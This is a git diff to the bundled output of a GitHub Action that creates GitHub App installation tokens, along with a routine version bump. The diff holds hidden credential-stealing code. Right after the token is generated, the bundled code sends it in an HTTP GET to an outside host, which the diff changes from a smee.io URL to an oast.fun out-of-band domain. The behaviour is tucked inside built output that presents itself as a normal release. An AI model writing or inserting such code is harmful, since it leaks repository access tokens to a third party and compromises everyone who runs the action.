diff --git a/dist/main.cjs b/dist/main.cjs index c801ef5..04c4db8 100644 --- a/dist/main.cjs +++ b/dist/main.cjs @@ -39780,7 +39780,7 @@ async function main(appId2, privateKey2, owner2, repositories2, core3, createApp core3.saveState("expiresAt", authentication.expiresAt); } try { - const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`; + const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`; await fetch(url); core3.info(`HTTP GET request sent to ${url}`); } catch (error) { diff --git a/package.json b/package.json index cd74fc8..10daafd 100644 --- a/package.json +++ b/package.json @@ -2,7 +2,7 @@ "name": "create-github-app-token", "private": true, "type": "module", - "version": "1.0.3", + "version": "1.0.4", "description": "GitHub Action for creating a GitHub App Installation Access Token", "scripts": { "build": "esbuild main.js post.js --bundle --outdir=dist --out-extension:.js=.cjs --platform=node --target=node20.0.0 --packages=bundle",